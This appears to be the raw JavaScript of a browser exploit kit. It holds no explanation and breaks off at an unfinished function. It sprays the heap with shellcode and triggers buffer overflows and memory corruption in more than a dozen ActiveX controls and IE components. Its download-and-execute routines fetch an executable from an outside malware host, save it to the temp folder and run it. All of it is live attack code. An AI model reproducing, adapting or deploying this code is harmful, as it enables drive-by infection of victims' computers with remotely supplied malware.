function crstr(str,l){
var instr = str;
do { instr += instr; } while(instr.length < l);
return instr.substr(0,l);
}function AOL(){
try{
var aolobj = document.createElement('object');
aolobj.setAttribute('classid', 'clsid:FE0BD779-44EE-4A4B-AA2E-743C63F2E5E6');
aolobj.setAttribute("id", "aolobj");
shellcode = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u552F%u7273%u3076%u2E34%u7572%u692F%u666E%u6365%u2E74%u6870%u3F70%u6469%u323D%u3936%u3F30%u6469%u323D%u3936%u2630%u7073%u3D6C%u3731");
bigblock = unescape("%u0c0c%u0c0c");
headersize = 20;
slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i<666;i++){memory[i] = block+shellcode}
bof=crstr(unescape("%ff"), 1400) + crstr(unescape("%0c"), 1000);
aolobj.ConvertFile(bof,1,1,1,1,1);
aolobj.ConvertFile(bof,1,1,1,1,1);
aolobj.ConvertFile(bof,1,1,1,1,1);
aolobj.ConvertFile(bof,1,1,1,1,1);
} catch(e) {}
}function cgagent(){
try{
var cgagent = document.createElement('object');
cgagent.setAttribute('classid', 'clsid:75108B29-202F-493C-86C5-1C182A485C4C');
cgagent.setAttribute("id", "cgagent");
var shellcode = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u552F%u7273%u3076%u2E34%u7572%u692F%u666E%u6365%u2E74%u6870%u3F70%u6469%u323D%u3936%u3F30%u6469%u323D%u3936%u2630%u7073%u3D6C%u3831");
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace)
bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000)
block = block+block+fillblock;
memory = new Array();
for (x=0; x<300; x++)
memory[x] = block + shellcode;
var buffer = '';
while (buffer.length < 796 )
buffer+=unescape("%u0c0c");
cgagent.CreateChinagames(buffer);
} catch(e) {}
}function CiscoWebex(){
try{
var CiscoWebex = document.createElement('object');
CiscoWebex.setAttribute('classid', 'clsid:32E26FD9-F435-4A20-A561-35D4B987CFDC');
CiscoWebex.setAttribute("id", "CiscoWebex");
var shellcode = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u552F%u7273%u3076%u2E34%u7572%u692F%u666E%u6365%u2E74%u6870%u3F70%u6469%u323D%u3936%u3F30%u6469%u323D%u3936%u2630%u7073%u3D6C%u3931");
var block = unescape("%u0909%u0909");
while (block.length < 0x25000) block += block;
var memory = new Array();
var i=0;
for (;i<1000;i++) memory[i] += block + shellcode;
memory[i] += shellcode;
var buf2;
for (var i=0; i<151; i++) buf2 += "X";
buf2 += unescape("%09%09%09%09");
CiscoWebex.NewObject(buf2);
} catch(e) {}
}function EasyMail(){
function getsSlide(sSlide, sSlideSize) {
while (sSlide.length*2<sSlideSize) {
sSlide += sSlide;
}
sSlide = sSlide.substring(0,sSlideSize/2);
return (sSlide);
}
try{
var EasyMail = document.createElement('object');
EasyMail.setAttribute('classid', 'clsid:5B8BE023-76A2-4F6D-8993-F7E588D79D98');
EasyMail.setAttribute("id", "EasyMail");
var sCode = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u552F%u7273%u3076%u2E34%u7572%u692F%u666E%u6365%u2E74%u6870%u3F70%u6469%u323D%u3936%u3F30%u6469%u323D%u3936%u2630%u7073%u3D6C%u3032");
var sSlide = unescape("%u9090%u9090");
var heapSA = 0x0c0c0c0c;
var heapBS = 0x400000;
var sizeHDM = 0x5;
var PLSize = (sCode.length * 2);
var sSlideSize = heapBS - (PLSize + sizeHDM);
var heapBlocks = (heapSA+heapBS)/heapBS;
var memory = new Array();
sSlide = getsSlide(sSlide,sSlideSize);
for (i=0;i<heapBlocks;i++) {
memory[i] = sSlide + sCode;
}
var buffSize = 3000;
var x = unescape("%0c%0c%0c%0c");
while (x.length<buffSize) x += x;
x = x.substring(0,buffSize);
EasyMail.CreateStore(x, 1);
} catch(e) {}
}function MPS(){
try{
var MPS = document.createElement('object');
MPS.setAttribute('classid', 'clsid:6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB');
MPS.setAttribute("id", "MPS");
var shellcode = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u552F%u7273%u3076%u2E34%u7572%u692F%u666E%u6365%u2E74%u6870%u3F70%u6469%u323D%u3936%u3F30%u6469%u323D%u3936%u2630%u7073%u3D6C%u3132");
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace)
bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000)
block = block+block+fillblock;
memory = new Array();
for (x=0; x<300; x++)
memory[x] = block + shellcode;
var buffer = '';
while (buffer.length < 4150)
buffer+="\x0c\x0c\x0c\x0c";
MPS.OnBeforeVideoDownload(buffer);
} catch(e) {}
}function Roxio(){
try{
var Roxio = document.createElement('object');
Roxio.setAttribute('classid', 'clsid:EE1BBA18-F0C8-477E-8AC8-C28B94F1B7DC');
Roxio.setAttribute("id", "Roxio");
shellcode = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u552F%u7273%u3076%u2E34%u7572%u692F%u666E%u6365%u2E74%u6870%u3F70%u6469%u323D%u3936%u3F30%u6469%u323D%u3936%u2630%u7073%u3D6C%u3232");
nops = unescape('%u9090%u9090');
headersize = 20;
slackspace = headersize + shellcode.length;
while(nops.length < slackspace) nops += nops;
fillblock = nops.substring(0, slackspace);
block = nops.substring(0, nops.length - slackspace);
while(block.length + slackspace < 262000) block = block + block + fillblock;
memory=new Array();
for(counter=0; counter<500; counter++) memory[counter] = block + shellcode;
buffer = 'A';
for(counter=0; counter<=200; counter++) buffer +=unescape('%0c%0c%0c%0c');
Roxio.SetIAPlayerName(buffer);
} catch(e) {}
}function Yahoo(){
try{
var Yahoo = document.createElement('object');
Yahoo.setAttribute('classid', 'clsid:9D39223E-AE8E-11D4-8FD3-00D0B7730277');
Yahoo.setAttribute("id", "Yahoo");
var shellcode = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u552F%u7273%u3076%u2E34%u7572%u692F%u666E%u6365%u2E74%u6870%u3F70%u6469%u323D%u3936%u3F30%u6469%u323D%u3936%u2630%u7073%u3D6C%u3332");
bigblock = unescape("%u9090%u9090");
headersize = 20;
slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (x=0; x<500; x++) memory[x] = block + shellcode;
var buffer = '\x0a';
while (buffer.length < 5000) buffer+='\x0a\x0a\x0a\x0a';
Yahoo.server = buffer;
Yahoo.receive();
} catch(e) {}
}function LPViewer() {
try {
var LPViewer = new ActiveXObject('LPViewer.LPViewer.1');
var shellcode = unescape('%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u552F%u7273%u3076%u2E34%u7572%u692F%u666E%u6365%u2E74%u6870%u3F70%u6469%u323D%u3936%u3F30%u6469%u323D%u3936%u2630%u7073%u3D6C%u3432');
var bigblock = unescape('%u4b27%uf943');
var headersize = 20;
var slackspace = headersize + shellcode.length;
while(bigblock.length < slackspace) bigblock += bigblock;
var fillblock = bigblock.substring(0,slackspace);
var block = bigblock.substring(0,bigblock.length - slackspace);
while (block.length + slackspace < 0x40000) block = block + block + fillblock;
var memory = new Array();
for (i=0; i<400; i++){ memory[i] = block + shellcode }
var buffer = "";
for (i=0; i<1224; i++) { buffer = buffer + unescape('%0c%0c%0c%0c'); }
LPViewer.URL = buffer;
}
catch(e) { }
}function Macrovision(){
try{
var Yahoo = document.createElement('object');
Macrovision.setAttribute('classid', 'clsid:E9880553-B8A7-4960-A668-95C68BED571E');
Macrovision.setAttribute("id", "Macrovision");
Macrovision.Initialize("Macrovision","Macrovision","","");
Macrovision.DownloadAndExecute("","",1,"http://Usrv04.ru/infect.php?id=2690&spl=4","");
Macrovision.DownloadAndInstall("True");
} catch(e) {}
}function RunACX(delay){
setTimeout("AOL()", 1000 * (delay + 1));
setTimeout("cgagent()", 1000 * (delay + 2));
setTimeout("CiscoWebex()", 1000 * (delay + 3));
setTimeout("EasyMail()", 1000 * (delay + 4));
setTimeout("MPS()", 1000 * (delay + 5));
setTimeout("Roxio()", 1000 * (delay + 6));
setTimeout("Yahoo()", 1000 * (delay + 7));
setTimeout("LPViewer()", 1000 * (delay + 8));
setTimeout("Macrovision()", 1000 * (delay + 9));
} function cobj(obj){
var ret=null;
if(obj.substring(0,1)=="{"){
try{
var clsid=obj.substring(1,obj.length-1);
ret=document.createElement("object");
ret.setAttribute("classid","clsid:"+clsid);
return ret;
}catch(e){
return null;
}
}else{
try{
ret=new ActiveXObject(obj);
return ret;
}catch(e){
return null;
}
}
} function sleep(func,naptime){
var sleeping = true;
var now = new Date();
var alarm;
var startingMSeconds = now.getTime();
while(sleeping){
alarm = new Date();
alarmMSeconds = alarm.getTime();
if (alarmMSeconds - startingMSeconds > naptime){ sleeping = false; }
}
eval(func);
}
var m=new Array();
var mf=0;
var url="http://Usrv04.ru/infect.php?id=2690";
function hex(num,width){
var digits="0123456789ABCDEF";
var hex=digits.substr(num&0xF,1);
while(num>0xF){
num=num>>>4;
hex=digits.substr(num&0xF,1)+hex;
}
var width=(width?width:0);
while(hex.length<width)hex="0"+hex;
return hex;
}
function addr(addr){
return unescape("%u"+hex(addr&0xFFFF,4)+"%u"+hex((addr>>16)&0xFFFF,4));
}
function unes(str){
var tmp="";
for(var i=0;i<str.length;i+=4){
tmp+=addr((str.charCodeAt(i+3)<<24)+
(str.charCodeAt(i+2)<<16)+
(str.charCodeAt(i+1)<<8)+
str.charCodeAt(i));
}
return unescape(tmp);
}
function hav(){
mf=mf;
setTimeout("hav()",1000);
}
function gss(ss,sss){
while(ss.length*2<sss)ss+=ss;
ss=ss.substring(0,sss/2);
return ss;
}
function ms(xpl){
var plc=unes("\x33\xC0\x64\x8B\x40\x30\x78\x0C\x8B\x40\x0C\x8B\x70\x1C\xAD\x8B\x58\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C\x8B\x58\x3C\x6A\x44\x5A\xD1\xE2\x2B\xE2\x8B\xEC\xEB\x4F\x5A\x52\x83\xEA\x56\x89\x55\x04\x56\x57\x8B\x73\x3C\x8B\x74\x33\x78\x03\xF3\x56\x8B\x76\x20\x03\xF3\x33\xC9\x49\x50\x41\xAD\x33\xFF\x36\x0F\xBE\x14\x03\x38\xF2\x74\x08\xC1\xCF\x0D\x03\xFA\x40\xEB\xEF\x58\x3B\xF8\x75\xE5\x5E\x8B\x46\x24\x03\xC3\x66\x8B\x0C\x48\x8B\x56\x1C\x03\xD3\x8B\x04\x8A\x03\xC3\x5F\x5E\x50\xC3\x8D\x7D\x08\x57\x52\xB8\x33\xCA\x8A\x5B\xE8\xA2\xFF\xFF\xFF\x32\xC0\x8B\xF7\xF2\xAE\x4F\xB8\x65\x2E\x65\x78\xAB\x66\x98\x66\xAB\xB0\x6C\x8A\xE0\x98\x50\x68\x6F\x6E\x2E\x64\x68\x75\x72\x6C\x6D\x54\xB8\x8E\x4E\x0E\xEC\xFF\x55\x04\x93\x50\x33\xC0\x50\x50\x56\x8B\x55\x04\x83\xC2\x7F\x83\xC2\x31\x52\x50\xB8\x36\x1A\x2F\x70\xFF\x55\x04\x5B\x33\xFF\x57\x56\xB8\x98\xFE\x8A\x0E\xFF\x55\x04\x57\xB8\xEF\xCE\xE0\x60\xFF\x55\x04"+url+xpl);
var hsta=0x0c0c0c0c,hbs=0x100000,pl=plc.length*2,sss=hbs-(pl+0x38);
var ss=gss(addr(hsta),sss),hb=(hsta-hbs)/hbs;
if (mf){
for (i=0;i<hb;i++)delete m[i];
CollectGarbage();
}
for(i=0;i<hb;i++)m[i]=ss+plc;
if(!mf){
mf=1;
hav();
}
return 0;
}
var padding = "AAAA";
var heapBase = 0x00150000;
var memo;
function init(maxAlloc){
while (4 + padding.length*2 + 2 < 65535)padding += padding;
memo = new Array();
flush();
}
function flush(){
delete memo["plunger"];
CollectGarbage();
memo["plunger"] = new Array();
var bytes = new Array(32, 64, 256, 32768);
for (var i = 0; i < 6; i++) {
for(var n = 0; n < 4; n++) {
var len = memo["plunger"].length;
eval("memo[\"plunger\"][len] = padding.substr(0, (" + bytes[n] + "-6)/2);");
}
}
}
function alloc(arg, tag){
var size;
size = arg;
if (size == 32 || size == 64 || size == 256 || size == 32768) {}
if ( ! memo[tag] )memo[tag] = new Array();
var len = memo[tag].length;
memo[tag][len] = padding.substr(0, (arg-6)/2);
}
function alloc_str(arg, tag){
var size;
size = 4 + arg.length*2 + 2;
if (size == 32 || size == 64 || size == 256 || size == 32768) {}
if ( ! memo[tag])memo[tag] = new Array();
var len = memo[tag].length;
memo[tag][len] = arg.substr(0, arg.length);
}
function free(tag) {
delete memo[tag];
CollectGarbage();
flush();
}
function CreateO(o,n){
var r=null;
try{r=o.CreateObject(n)}catch(e){}
if(!r){try{r=o.CreateObject(n,"")}catch(e){}}
if(!r){try{r=o.CreateObject(n,"","")}catch(e){}}
if(!r){try{r=o.GetObject("",n)}catch(e){}}
if(!r){try{r=o.GetObject(n,"")}catch(e){}}
if(!r){try{r=o.GetObject(n)}catch(e){}}
return(r);
}
function Go(a){
var eurl=url+"&spl=7";
var fname="w32NOFJCyliz5mm5R.exe";
var fso=a.CreateObject("Scripting.FileSystemObject","")
var sap=CreateO(a,"Shell.Application");
var x=CreateO(a,"ADODB.Stream");
var nl=null;
fname=fso.BuildPath(fso.GetSpecialFolder(2),fname);
x.Mode=3;
try{nl=CreateO(a,"Micr"+"osoft.XMLH"+"TTP");nl.open("GET",eurl,false);}
catch(e){try{nl=CreateO(a,"MSXML2.XMLHTTP");nl.open("GET",eurl,false);}
catch(e){try{nl=CreateO(a,"MSXML2.ServerXMLHTTP");nl.open("GET",eurl,false);}
catch(e){try{nl=new XMLHttpRequest();nl.open("GET",eurl,false);}
catch(e){return 0;}}}}
x.Type=1;
nl.send(null);
rb=nl.responseBody;
x.Open();
x.Write(rb);
x.SaveTofile(fname,2);
sap.ShellExecute(fname);
return 1;
}
function attack(s){
var obj=null;
if(s==1){
var i=0;
var target=new Array("BD96C556-65A3-11D0-983A-00C04FC29E36","BD96C556-65A3-11D0-983A-00C04FC29E30","AB9BCEDD-EC7E-47E1-9322-D4A210617116","0006F033-0000-0000-C000-000000000046","0006F03A-0000-0000-C000-000000000046","6e32070a-766d-4ee6-879c-dc1fa91d2fc3","6414512B-B978-451D-A0D8-FCFDF33E833C","7F5B7F63-F06F-4331-8A26-339E03C0AE3D","06723E09-F4C2-43c8-8358-09FCD1DB0766","639F725F-1B2D-4831-A9FD-874847682010","BA018599-1DB3-44f9-83B4-461454C84BF8","D0C07D56-7C69-43F1-B4A0-25F5A11FAB19","E8CCCDDF-CA28-496b-B050-6C07C962476B",null);
while(target[i]){
var a=null;
a=document.createElement("object");
a.setAttribute("classid","clsid:"+target[i]);
if(a){try{var b=CreateO(a,"Shell.Application");if(b){Go(a);}}catch(e){}}
i++;
}
sleep("attack(4);",4000);
return 0;
}
if(s==3){
try{
obj=cobj("WebViewFolderIcon.WebViewFolderIcon.1");
if(obj){
ms("&spl=8");
for(var i=0;i<128;i++){
var wvfio=new ActiveXObject("WebViewFolderIcon.WebViewFolderIcon.1");
try{wvfio.setSlice(0x7ffffffe,0,0,202116108);}catch(e){}
var wvfit=new ActiveXObject("WebViewFolderIcon.WebViewFolderIcon.1");
}
sleep("attack(7);",2000);
return 0;
}
}catch(e){}
sleep("attack(7);",1);
return 0;
}
if(s==4){
try{
obj=cobj("{EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F}");
if(obj){
ms("&spl=9");
z=Math.ceil(0x0c0c0c0c);
z=document.scripts[0].createControlRange().length;
sleep("attack(3);",2000);
return 0;
}
}catch(e){}
sleep("attack(3);",1);
return 0;
}
if(s==7){
try{
obj=cobj("{77829F14-D911-40FF-A2F0-D11DB8D6D0BC}");
if(obj){
ms("&spl=10");
var buf = "";
while (buf.length < 5000) buf += "\x0c\x0c\x0c\x0c";
obj.SetFormatLikeSample(buf);
sleep("attack(9);",2000);
return 0;
}
}catch(e){}
sleep("attack(9);",1);
return 0;
}
if(s==9){
try{
obj=cobj("DirectAnimation.PathControl");
if(obj){
ms("&spl=11");
init();
var jmpecx = 0x0c0c0c0c;
var vtable = addr(0x7ceb9090);
for (var i = 0; i < 124/4; i++)vtable += addr(jmpecx);
vtable += padding.substr(0, (1008-138)/2);
var fakeObjPtr = heapBase + 0x688 + ((1008+8)/8)*48;
var fakeObjChunk = padding.substr(0, (0x200c-4)/2) + addr(fakeObjPtr) + padding.substr(0, 14/2);
CollectGarbage();
flush();
for (var i = 0; i < 100; i++)alloc_str(vtable);
alloc_str(vtable, "lookaside");
free("lookaside");
for (var i = 0; i < 100; i++)alloc(0x2010);
for (var i = 0; i < 2; i++) {
alloc_str(fakeObjChunk);
alloc_str(fakeObjChunk, "freeList");
}
alloc_str(fakeObjChunk);
free("freeList");
obj.KeyFrame(0x40000801, new Array(1), new Array(1));
sleep("attack(10);",2000);
return 0;
}
}catch(e){}
sleep("attack(10);",1);
return 0;
}
if(s==10){
snpac();
return 0;
}
}function xml(){
var shellcode=unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u552F%u7273%u3076%u2E34%u7572%u692F%u666E%u6365%u2E74%u6870%u3F70%u6469%u323D%u3936%u3F30%u6469%u323D%u3936%u2630%u7073%u3D6C%u0035");
var spray = unescape("%u0a0a%u0a0a");
do { spray += spray; } while(spray.length < 0xd0000);
memory = new Array();
for(i = 0; i < 100; i++){ memory[i] = spray + shellcode; }
document.getElementById("cmpjoqjukl").innerHTML = "<XML ID=I><X><C><![CDATA[<image SRC=http://ਊਊ.example.com>]]></C></X></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML><XML ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>";
}function pdf(){
try {
var obj = null;
obj = new ActiveXObject("AcroPDF.PDF");
if (!obj) {obj = new ActiveXObject("PDF.PdfCtrl");}
if (obj) {document.getElementById("yliljaha").innerHTML = "<embed width='150' height='150' src='http://Usrv04.ru/pdf.php?id=2690' type='application/pdf'></embed>";}
} catch(e) {
document.getElementById("yliljaha").innerHTML = "<embed width='150' height='150' src='http://Usrv04.ru/pdf.php?id=2690' type='application/pdf'></embed>";
}
}function snpac(){
var buf1 = 'http://Usrv04.ru/infect.php?id=2690&spl=4';
try{
var obj = document.createElement('object');
obj.setAttribute('classid', 'clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9');
obj.setAttribute("id", "obj");
obj.SnapshotPath = buf1;
obj.CompressedPath = 'C:\NOFCym2lizm5Rw35.exe';
obj.PrintSnapshot();
} catch(e) {}
}function MS09002(){
